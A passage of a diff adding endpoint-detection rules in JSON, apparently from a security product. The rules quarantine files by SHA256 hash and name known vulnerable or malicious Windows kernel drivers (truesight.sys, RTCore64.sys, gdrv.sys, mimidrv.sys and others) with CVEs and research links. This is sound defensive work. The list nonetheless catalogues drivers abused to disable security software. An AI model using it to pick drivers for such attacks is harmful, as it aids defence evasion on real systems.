+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.816510Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5ec92bab224368247d83a9faa46b771fcfaf43480904d23ff06bea5d77f3eb3c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "81b88910-51c6-5d1a-8c1e-1cd71b4543f7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.484116Z",
+ "creation_date": "2026-03-23T11:45:31.484119Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.484128Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "379c0d846b505affc22a61bc5ccfc3f58c51321ab733342c6f94a1d0c8e9463e",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "81c20eb7-0904-5b6b-ba49-480d37e16bf0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.969470Z",
+ "creation_date": "2026-03-23T11:45:29.969472Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.969478Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5512aea158c30e4f52c1e27136c1c803c98388d1d8c7269e497728fd0b57d9f5",
+ "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "81c311b2-2334-5add-a7fe-6e86066bd453",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.482621Z",
+ "creation_date": "2026-03-23T11:45:31.482626Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.482635Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d79be2d97137276e5cf9fb07fef8df72dd20701e1ff4e7ec9180a8ff5567aa50",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "81c4c3e5-12cc-5826-8252-c03f54af80d0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.142700Z",
+ "creation_date": "2026-03-23T11:45:31.142702Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.142708Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "48363eb346fff1e20a8eca484e6447cb232ec8ae009555631bf7c7d7a97b15c8",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "81c5c3af-43d1-5142-9305-0ade01ddc6cc",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.142326Z",
+ "creation_date": "2026-03-23T11:45:31.142328Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.142334Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d4f334bccb62825eeead6a3062b7425afe50b674207f88d6fbd4aef8e5510365",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "81c77c29-ea52-5537-849a-83edbe7a162c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.615135Z",
+ "creation_date": "2026-03-23T11:45:29.615137Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.615142Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c2a4ddcc9c3b339d752c48925d62fc4cc5adbf6fae8fedef74cdd47e88da01f8",
+ "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "81c7a7b8-d0a3-5325-8796-0d39ce115cc6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.613648Z",
+ "creation_date": "2026-03-23T11:45:29.613651Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.613656Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7aaf2aa194b936e48bc90f01ee854768c8383c0be50cfb41b346666aec0cf853",
+ "comment": "Vulnerable Kernel Driver (aka AsrSetupDrv103.sys) [https://www.loldrivers.io/drivers/19003e00-d42d-4cbe-91f3-756451bdd7da/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "81c7ce45-ec56-58b8-87a7-5b6c7e74f13c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.607328Z",
+ "creation_date": "2026-03-23T11:45:29.607330Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.607336Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b61869b7945be062630f1dd4bae919aecee8927f7e1bc3954a21ff763f4c0867",
+ "comment": "Micro-Star MSI Afterburner vulnerable driver (aka RTCore32.sys and RTCore64.sys) [CVE-2019-16098] [https://www.loldrivers.io/drivers/275c80c5-a67c-4536-b29e-4e481242cb01/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "81d7798e-d940-52ea-a377-a9db19240d83",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.472666Z",
+ "creation_date": "2026-03-23T11:45:31.472670Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.472679Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "42392416a73b17679bf2e75083f6b7cf216eebcb63a2c10192041d630d783fe8",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "81e24cdd-be88-5359-9047-4865188375f9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.463784Z",
+ "creation_date": "2026-03-23T11:45:30.463787Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.463795Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8b30b2dc36d5e8f1ffc7281352923773fb821cdf66eb6516f82c697a524b599b",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "81e40760-4443-526f-8e1d-2eee594ccb7d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.820048Z",
+ "creation_date": "2026-03-23T11:45:30.820050Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.820055Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "221369498ae77e0ff60ce2f59de6ef2bbb01aca8cd55d7a8487760068f5a544a",
+ "comment": "Vulnerable Kernel Driver (aka nvoclock.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "81e97c58-d1ab-5ad8-94ee-a4a1d04159b2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.609557Z",
+ "creation_date": "2026-03-23T11:45:29.609559Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.609565Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1251eef40b877fd379c175c02bb83e230fa5acd30020e54acc0718ab326818b3",
+ "comment": "Gigabyte vulnerable driver (aka gdrv.sys) [CVE-2018-19320] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "81f6dccc-f833-50d1-a017-1bc8760f609e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.619089Z",
+ "creation_date": "2026-03-23T11:45:29.619091Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.619096Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e5a6fe0d0a3894f55b7ba9b4d5a03022f6146544f1f874ae1ef32c29450535b7",
+ "comment": "NVIDIA vulnerable flash tool (aka nvflash.sys nd nvflsh64.sys) [CVE-2019-5688] [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "82009fe8-8ce7-5f62-8540-f4fe4b9614c9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.480397Z",
+ "creation_date": "2026-03-23T11:45:31.480400Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.480410Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e032410a55db0311918bdf411fe403b745c02a6112d4ac9dc8689d1ae6dc7dd2",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8209f5d8-4d19-5721-b7b5-b3459c3c36f5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.824367Z",
+ "creation_date": "2026-03-23T11:45:30.824369Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.824375Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "416e71a3fd5f8d20caea3661d95b48a70cab35650fa7fc9db59ceeff80a324da",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "820ee5ee-a888-5a77-b1e7-ac901d894562",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.980837Z",
+ "creation_date": "2026-03-23T11:45:29.980839Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.980845Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2b120de80a5462f8395cfb7153c86dfd44f29f0776ea156ec4a34fa64e5c4797",
+ "comment": "Vulnerable Kernel Driver (aka BEDAISY.SYS) [https://www.loldrivers.io/drivers/db666d40-c9fa-4039-bfac-a5d7afd61b67/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "82132cd3-b01f-5ebe-b044-89105206d9ed",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.981147Z",
+ "creation_date": "2026-03-23T11:45:29.981149Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.981155Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7c830ed39c9de8fe711632bf44846615f84b10db383f47b7d7c9db29a2bd829a",
+ "comment": "Vulnerable Kernel Driver (aka BEDAISY.SYS) [https://www.loldrivers.io/drivers/db666d40-c9fa-4039-bfac-a5d7afd61b67/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "821a7c74-445d-5d22-b6a7-b4bec318d4d4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.144390Z",
+ "creation_date": "2026-03-23T11:45:32.144392Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.144398Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2e6b039e10d2b93fbce625ecb7bf04b38eac69b96385fc3b28541c8da78fd8ad",
+ "comment": "Malicious Kernel Driver (aka idmtdi.sys) [https://www.loldrivers.io/drivers/c2e98102-2055-48f0-9449-3e7a7f2c0ffe/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "821b5805-f6c2-5f9b-8f73-a7bddf3102f0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.143114Z",
+ "creation_date": "2026-03-23T11:45:32.143116Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.143121Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ada2b855757c9062231f5ed4e80365b8d8094e9adbce8f26d1ff5ea0b7a70c77",
+ "comment": "Vulnerable Kernel Driver (aka echo_driver.sys) [https://www.loldrivers.io/drivers/afb8bb46-1d13-407d-9866-1daa7c82ca63/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "821bb7bc-006c-55e6-9257-cebf8d3770d3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.490401Z",
+ "creation_date": "2026-03-23T11:45:31.490403Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.490409Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9fafa5175851027e63ca29722169b363f0558426ea7a58640578c3e6d2e3407a",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8232b798-0edd-555f-a8e0-fbdfc96bf56a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.833616Z",
+ "creation_date": "2026-03-23T11:45:30.833619Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.833628Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2846aeae7f34281c69a7f6183797768f4418a8fc76119800d5f15d47bcdb85ec",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "823655e8-9929-50fb-97fa-f5d8c9532ef8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.147734Z",
+ "creation_date": "2026-03-23T11:45:31.147736Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.147741Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c7055b8634a17d0a88825995b91cfebf00d177add33c1d1d5d2de77b000128d5",
